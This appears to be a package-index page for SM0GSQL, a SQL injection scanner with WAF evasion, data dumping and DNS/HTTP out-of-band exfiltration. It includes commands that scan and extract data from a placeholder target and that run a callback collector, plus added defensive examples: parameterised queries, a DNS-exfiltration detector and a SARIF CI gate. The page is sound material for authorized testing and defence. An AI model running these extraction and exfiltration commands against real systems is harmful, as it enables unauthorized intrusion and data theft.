
SM0GSQL — Context-aware SQL injection scanner with WAF detection and evasion

Project description

SM0GSQL

Context-aware SQL injection scanner with WAF detection, evasion, and one-command data extraction.


+--------------------------------------------------------------+
|                                                              |
|╭╌╌╌╌╌╌╌╌╌╌╌╌╌╮ ╭╌╌╌╌╌╌╌╌╌╌╌╌╌╮ ╭╌╌╌╌╌╌╌╌╌╌╌╌╌╮ ╭╌╌╌╌╌╌╌╌╌╌╌╌╮|
|╎   ◎ INFIL   ╎ ╎  ◈ BYPASS   ╎ ╎  ▣ OPERATE  ╎ ╎ ⊟ EXTRACT  ╎|
|╰╌╌╌╌╌╌╌╌╌╌╌╌╌╯ ╰╌╌╌╌╌╌╌╌╌╌╌╌╌╯ ╰╌╌╌╌╌╌╌╌╌╌╌╌╌╯ ╰╌╌╌╌╌╌╌╌╌╌╌╌╯|
|                                                              |
+==============================================================+
|   _____ __  __  ___   _____  _____  ____  _                  |
|  / ____|  \/  |/ _ \ / ____|/ ____|/ __ \| |                 |
| | (___ | \  / | | | | |  __| (___ | |  | | |                 |
|  \___ \| |\/| | | | | | |_ |\___ \| |  | | |                 |
|  ____) | |  | | |_| | |__| |____) | |__| | |____             |
| |_____/|_|  |_|\___/ \_____|_____/ \___\_\______|            |
+==============================================================+

Highlights

  • 🎯 Six detection techniques — error-based, boolean-blind, time-blind, UNION, stacked-query, and out-of-band (OOB).
  • Async engine — concurrent probing over httpx; timing-sensitive checks fall back to a sequential stall mode for accurate time-based oracles.
  • 🛡️ WAF fingerprinting + evasion — detects the wall in front of the app and adapts payloads to get past it.
  • 💉 One-command extraction — confirm an injection and dump schemas, tables, and rows in the same run with --exploit.
  • 🗄️ All major backends — MySQL/MariaDB, PostgreSQL, MSSQL, Oracle, and SQLite.
  • 🕸️ Surface discovery — built-in crawler, headless-browser crawl, and OpenAPI spec ingestion.
  • 📄 Reports everywhere — terminal summary plus HTML, JSON, and SARIF (CI / code-scanning) output.

Install

pip install sm0g-sql

This pulls the engine dependencies (sm0g-cli, sm0g-core, sm0g-payloads) automatically.

From source (development)

git clone <repo> && cd SM0GSQL
python -m venv .venv && source .venv/bin/activate
pip install -e ".[dev]"     # editable install + test/lint tooling
pytest -q                   # run the suite

Quick start

# scan a single URL
sm0gsql "https://target.tld/item?id=1"

# crawl first, then scan everything found
sm0gsql "https://target.tld/" --crawl

# confirm + extract in one shot (writes HTML/TXT/JSON into a per-target folder)
sm0gsql "https://target.tld/item?id=1" --exploit

Techniques

Pass any combination to --technique (default: EBTUO):

  Flag  Technique      Notes
  E     Error-based    Reads DBMS errors reflected in the response.
  B     Boolean-blind  Differential true/false response analysis.
  T     Time-blind     Time-delay oracle (uses the sequential stall mode).
  U     UNION          Column-count discovery + UNION data read.
  S     Stacked query  Stacked statements where the driver allows them.
  O     Out-of-band    DNS/HTTP exfil via the bundled collector (below).

For example, boolean-blind, time-blind, and UNION only, at risk and level 2:

sm0gsql "https://target.tld/item?id=1" --technique BTU --risk 2 --level 2
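Added example, not SM0GSQL's own code: a SQLite-backed lookup built by string concatenation beside its parameterised form, showing the two oracles that techniques E and B rely on (a reflected DBMS error and a true/false response difference) and why bound parameters with strict typing remove both. The table and endpoint are constructed stand-ins for the item?id=1 URL used above.

```python
import sqlite3

# Constructed in-memory catalogue standing in for the item?id=1 endpoint above.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)",
                     [(1, "widget"), (2, "gadget"), (3, "gizmo")])
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, item_id: str) -> dict:
    """String concatenation: the injection point a scanner probes. A syntax
    error surfaces the DBMS message, which is what technique E reads."""
    try:
        rows = conn.execute(f"SELECT name FROM items WHERE id = {item_id}").fetchall()
        return {"status": 200, "names": [r[0] for r in rows]}
    except sqlite3.Error as exc:
        return {"status": 500, "error": str(exc)}

def lookup_hardened(conn: sqlite3.Connection, item_id: str) -> dict:
    """Strict typing plus a bound parameter: user input never reaches the SQL
    text, and a bad value yields a fixed 400 with no DBMS detail."""
    try:
        n = int(item_id)
    except ValueError:
        return {"status": 400, "names": []}
    rows = conn.execute("SELECT name FROM items WHERE id = ?", (n,)).fetchall()
    return {"status": 200, "names": [r[0] for r in rows]}

def boolean_oracle_present(handler, conn: sqlite3.Connection) -> bool:
    """Technique B in miniature: an always-true condition must look like the
    plain request while an always-false one must differ. With the hardened
    handler both appended conditions fail type validation identically."""
    base = handler(conn, "1")
    true_case = handler(conn, "1 AND 1=1")
    false_case = handler(conn, "1 AND 1=2")
    return base == true_case and true_case != false_case
```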

Usage

sm0gsql <url> [options]

  Option                                        Description                                             Default
  --technique EBTUSO                            Techniques to run (see table above)                     EBTUO
  --risk 1-3                                    Payload aggressiveness                                  1
  --level 1-3                                   Injection-point depth                                   1
  --dbms NAME                                   Backend hint: mysql, postgres, mssql, oracle, sqlite    auto
  --crawl                                       Crawl the site before scanning                          off
  --crawl-depth N                               Crawler depth                                           3
  --browser-crawl                               Use a headless browser to crawl                         off
  --openapi PATH/URL                            Seed surfaces from an OpenAPI spec
  --exploit                                     Extract data after a confirmed finding                  off
  --dump TABLE / --dump-all                     Dump a table / all tables
  --dump-rows N                                 Max rows per table (0 = default cap)                    0
  --oob DOMAIN                                  OOB callback domain
  --oob-poll URL                                Endpoint returning observed callbacks
  --login-url / --login-user / --login-pass     Authenticate before scanning
  -H "Name: Value"                              Add a header (repeatable)
  --cookies "k=v; ..."                          Cookie string
  --proxy URL                                   Route traffic through an HTTP proxy
  --evasion MODE                                WAF-evasion transform(s)
  --random-agent                                Rotate the User-Agent                                   off
  --threads N                                   Concurrency                                             5
  --timeout N / --delay S                       Request timeout / per-request delay                     15 / 0
  --time-threshold N                            Time-based oracle threshold (s)                         4
  --verify-ssl                                  Verify TLS certificates                                 off
  -d, --data BODY                               POST body
  --output-json / --output-sarif / --report-html PATH  Write reports
  -v, --verbose                                 Verbose output                                          off

Out-of-band extraction

OOB techniques exfiltrate data through DNS/HTTP callbacks. A minimal collector ships with the package as the sm0gsql-oob command — run it on a host the target can reach:

sudo sm0gsql-oob          # DNS on udp/53, poll endpoint on http://0.0.0.0:8000/poll

Then point the target's resolver at that box and run the scan:

sm0gsql "https://target.tld/item?id=1" \
  --technique O --oob exfil.your-domain.tld \
  --oob-poll http://your-collector:8000/poll

Binding udp/53 requires root / CAP_NET_BIND_SERVICE.
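The defender's counterpart to the OOB setup above, as an added example that is not part of the package: a check over resolver query logs that flags DNS names whose leftmost label looks like encoded data (long hex runs or long high-entropy strings) sent to a zone outside an allow-list, which is the shape a DNS callback from a database host takes. The log lines, the example.com/example.net allow-list and the exfil.your-domain.tld names are constructed.

```python
import math
import re
from collections import Counter

# Constructed resolver log, "<client-ip> <queried-name>" per line. Not real traffic;
# the hex and base64-looking labels stand in for encoded callback data.
SAMPLE_DNS_LOG = """\
10.0.3.7 www.example.com
10.0.3.7 3136623839.exfil.your-domain.tld
10.0.3.7 4d7953514c20352e37.exfil.your-domain.tld
10.0.3.9 cdn.example.net
10.0.3.9 aGVsbG8gd29ybGQhMTIz.exfil.your-domain.tld
10.0.3.9 mail.example.com
"""

HEX_LABEL = re.compile(r"^[0-9a-fA-F]{8,}$")

def label_entropy(label: str) -> float:
    """Shannon entropy (bits per character) of one DNS label."""
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values())

def is_suspect_query(qname: str, allowed_zones: set) -> bool:
    """True when the leftmost label looks like encoded data sent to an
    unfamiliar zone: a long hex run, or a long high-entropy string."""
    labels = qname.rstrip(".").split(".")
    zone = ".".join(labels[-2:]).lower()      # registrable-domain approximation
    if zone in allowed_zones:
        return False
    first = labels[0]
    if HEX_LABEL.match(first):
        return True
    return len(first) >= 16 and label_entropy(first) > 3.5

def suspect_queries(log_text: str, allowed_zones: set) -> list:
    """Return (client, qname) pairs worth alerting on. Grouping by client shows
    which host (for SQLi OOB, typically the database server) is calling out."""
    hits = []
    for line in log_text.splitlines():
        client, qname = line.split(maxsplit=1)
        if is_suspect_query(qname.strip(), allowed_zones):
            hits.append((client, qname.strip()))
    return hits
```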

Output & reports

  • Terminal — a colored summary of every confirmed finding.
  • --exploit — writes JSON + TXT + HTML into a ./<target-host>/ folder.
  • --report-html / --output-json / --output-sarif — emit individual reports anywhere; SARIF plugs straight into CI / code-scanning.
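A consumer for the SARIF output in a CI job, as an added example rather than code shipped with the package: it flattens every result in the report and returns a non-zero exit code when any finding reaches a chosen severity. The SARIF document is constructed in the standard 2.1.0 shape; the tool name, rule ids and messages are placeholders, not SM0GSQL's actual rule set.

```python
import json

# Constructed SARIF 2.1.0 document in the general shape of a scanner's --output-sarif
# report. Tool name, rule ids and messages are placeholders, not SM0GSQL's own.
SAMPLE_SARIF = json.dumps({
    "version": "2.1.0",
    "runs": [{
        "tool": {"driver": {"name": "example-scanner"}},
        "results": [
            {"ruleId": "sqli/boolean-blind", "level": "error",
             "message": {"text": "boolean-blind injection in parameter id"},
             "locations": [{"physicalLocation": {
                 "artifactLocation": {"uri": "https://target.tld/item?id=1"}}}]},
            {"ruleId": "info/waf-detected", "level": "note",
             "message": {"text": "WAF fingerprinted in front of the target"}},
        ],
    }],
})

# SARIF result levels, lowest to highest; a result with no level counts as "warning".
SEVERITY_RANK = {"none": 0, "note": 1, "warning": 2, "error": 3}

def sarif_findings(text: str) -> list:
    """Flatten every result in every run to (ruleId, level, uri, message)."""
    out = []
    for run in json.loads(text).get("runs", []):
        for res in run.get("results", []):
            uri = None
            for loc in res.get("locations", []):
                uri = loc.get("physicalLocation", {}).get("artifactLocation", {}).get("uri")
                break
            out.append((res.get("ruleId"), res.get("level", "warning"), uri,
                        res.get("message", {}).get("text", "")))
    return out

def ci_exit_code(text: str, fail_at: str = "warning") -> int:
    """1 when any finding is at or above fail_at (so the pipeline stops), else 0."""
    threshold = SEVERITY_RANK[fail_at]
    blocking = [f for f in sarif_findings(text) if SEVERITY_RANK.get(f[1], 2) >= threshold]
    return 1 if blocking else 0

if __name__ == "__main__":
    for rule, level, uri, msg in sarif_findings(SAMPLE_SARIF):
        print(f"[{level}] {rule} {uri or ''}: {msg}")
    print("exit code:", ci_exit_code(SAMPLE_SARIF))
```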

Authorization & legal

SM0GSQL is for authorized security testing only — penetration tests, bug-bounty programs within scope, CTFs, and your own lab/staging systems. Running it against systems you do not own or have explicit written permission to test is illegal in most jurisdictions. You are solely responsible for how you use this tool.

License

AGPL-3.0-or-later — Copyright (c) 2026 SM0G-SEC by roc1t1z3not.

File details

Details for the file sm0g_sql-0.1.5.tar.gz.

File metadata

  • Download URL: sm0g_sql-0.1.5.tar.gz
  • Size: 1.2 MB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.13.12

File hashes

Hashes for sm0g_sql-0.1.5.tar.gz

  Algorithm    Hash digest
  SHA256       5b2302d9e65b6d56af131ef7e13cfb2a74cccbd8757facbc53b4db034d7a92da
  MD5          5b16bd0bbf4fd064a1c2aa028e37a513
  BLAKE2b-256  2f1382f90364ac731d882ad9941263d681d48bce925ce59ea1c8fe708935d5e7


File details

Details for the file sm0g_sql-0.1.5-py3-none-any.whl.

File metadata

  • Download URL: sm0g_sql-0.1.5-py3-none-any.whl
  • Size: 81.5 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.13.12

File hashes

Hashes for sm0g_sql-0.1.5-py3-none-any.whl

  Algorithm    Hash digest
  SHA256       71e0bf64cd34c0842d0c6e78b805a90796b75d5556276b00b1ec10a13e4d6d2e
  MD5          c3de457bb94824d5ee211e6fa8add27e
  BLAKE2b-256  f9509fab637d0222a652478f13faafb1bf2aaffa909614a586c7a9e4a140e7da
